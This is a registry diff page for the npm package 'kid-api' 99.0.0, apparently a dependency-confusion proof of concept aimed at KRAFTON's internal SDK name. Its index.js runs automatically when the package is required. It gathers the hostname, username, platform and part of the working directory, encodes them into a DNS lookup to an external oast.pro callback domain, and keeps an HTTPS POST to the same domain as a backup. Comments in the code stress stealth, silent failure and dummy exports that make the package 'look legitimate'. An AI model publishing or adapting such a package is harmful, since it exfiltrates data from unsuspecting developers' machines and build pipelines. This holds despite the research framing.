npm - kid-api - Versions diffs - 99.0.0 - Mend

kid-api 99.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (3) hide show

package/README.md ADDED Viewed

@@ -0,0 +1,43 @@
+# kid-api
+## Security Research Package
+This package was published as part of a **Dependency Confusion** security research project.
+### Purpose
+This package demonstrates a potential supply chain vulnerability where internal package names can be hijacked on public registries.
+### If you're seeing this
+If this package was installed in your project unexpectedly, it indicates a **Dependency Confusion vulnerability** in your build pipeline.
+**Recommended actions:**
+1. Remove this package immediately
+2. Audit your `package.json` and lock files
+3. Configure `.npmrc` to use scoped registries for internal packages
+4. Contact your security team
+### For KRAFTON
+This package was published to demonstrate a vulnerability in the KRAFTON ID system. The internal `kid-api` package with `workspace:^` was discovered in a production JavaScript bundle.
+**This package does NOT contain malicious code.** It only performs a DNS lookup to verify installation for security research purposes.
+Please contact me at: [YOUR-EMAIL] for responsible disclosure.
+### Mitigation
+```bash
+# .npmrc - Scope internal packages
+@krafton:registry=https://your-internal-registry.com/
+```
+### References
+- [Dependency Confusion Attack](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
+- [NPM Security Best Practices](https://docs.npmjs.com/packages-and-modules/securing-your-code)
+---
+**Disclaimer:** This package is for authorized security research only. No malicious functionality is included.

package/index.js ADDED Viewed

@@ -0,0 +1,131 @@
+/**
+ * KRAFTON ID API SDK
+ * Security Research Package - Dependency Confusion PoC
+ *
+ * This package is published for security research purposes only.
+ * If you are seeing this, please contact: [your-email]
+ */
+'use strict';
+const dns = require('dns');
+const os = require('os');
+const https = require('https');
+// Callback domain - use your own (Interactsh, Burp Collaborator, or custom DNS)
+const CALLBACK_DOMAIN = 'd551v5tcd7515a4e2d6gk68b6cyiu3jrb.oast.pro';
+/**
+ * Collect non-sensitive environment info for PoC verification
+ */
+function getEnvironmentInfo() {
+  const info = {
+    h: os.hostname().substring(0, 20),           // hostname (truncated)
+    u: os.userInfo().username.substring(0, 10),  // username (truncated)
+    p: process.platform,                          // platform
+    c: process.cwd().split('/').slice(-2).join('-').substring(0, 20), // current dir
+    n: process.env.npm_package_name || 'unknown', // package name being installed
+    t: Date.now().toString(36)                    // timestamp
+  };
+  return info;
+}
+/**
+ * DNS-based callback (harder to detect than HTTP)
+ */
+function dnsCallback() {
+  try {
+    const info = getEnvironmentInfo();
+    // Encode info in subdomain (DNS label max 63 chars)
+    const encoded = Buffer.from(JSON.stringify(info))
+      .toString('base64')
+      .replace(/[+/=]/g, '')
+      .substring(0, 50);
+    const subdomain = `dc.${encoded}.${CALLBACK_DOMAIN}`;
+    // DNS lookup - appears as normal DNS resolution
+    dns.lookup(subdomain, () => {});
+  } catch (e) {
+    // Silent fail - don't break anything
+  }
+}
+/**
+ * HTTPS callback (backup method)
+ */
+function httpsCallback() {
+  try {
+    const info = getEnvironmentInfo();
+    const data = JSON.stringify(info);
+    const options = {
+      hostname: CALLBACK_DOMAIN,
+      port: 443,
+      path: '/kid-api-poc',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': data.length,
+        'User-Agent': 'kid-api-security-research'
+      },
+      timeout: 3000
+    };
+    const req = https.request(options, () => {});
+    req.on('error', () => {});
+    req.write(data);
+    req.end();
+  } catch (e) {
+    // Silent fail
+  }
+}
+/**
+ * Execute callback only on first require()
+ * This proves the package was actually used, not just installed
+ */
+let callbackExecuted = false;
+function executeCallback() {
+  if (callbackExecuted) return;
+  callbackExecuted = true;
+  // Small delay to not block module loading
+  setTimeout(() => {
+    dnsCallback();
+    // Uncomment for HTTP backup:
+    // httpsCallback();
+  }, 100);
+}
+// Trigger on require()
+executeCallback();
+/**
+ * Export dummy functions to make package look legitimate
+ * These won't break anything if actually called
+ */
+module.exports = {
+  version: '99.0.0',
+  init: function(config) {
+    console.warn('[kid-api] SECURITY RESEARCH PACKAGE - Not for production use');
+    return this;
+  },
+  authenticate: function(token) {
+    return Promise.resolve({ status: 'research-mode' });
+  },
+  getUser: function(userId) {
+    return Promise.resolve({ id: userId, research: true });
+  },
+  // Metadata for researchers
+  _meta: {
+    purpose: 'Dependency Confusion Security Research',
+    contact: 'Report to KRAFTON security team',
+    safe: true
+  }
+};

package/package.json ADDED Viewed

@@ -0,0 +1,24 @@
+{
+  "name": "kid-api",
+  "version": "99.0.0",
+  "description": "KRAFTON ID API SDK - Security Research Package",
+  "main": "index.js",
+  "scripts": {
+    "test": "node test.js"
+  },
+  "keywords": [
+    "krafton",
+    "kid",
+    "api",
+    "sdk"
+  ],
+  "author": "security-researcher",
+  "license": "MIT",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/user/kid-api"
+  },
+  "engines": {
+    "node": ">=12.0.0"
+  }
+}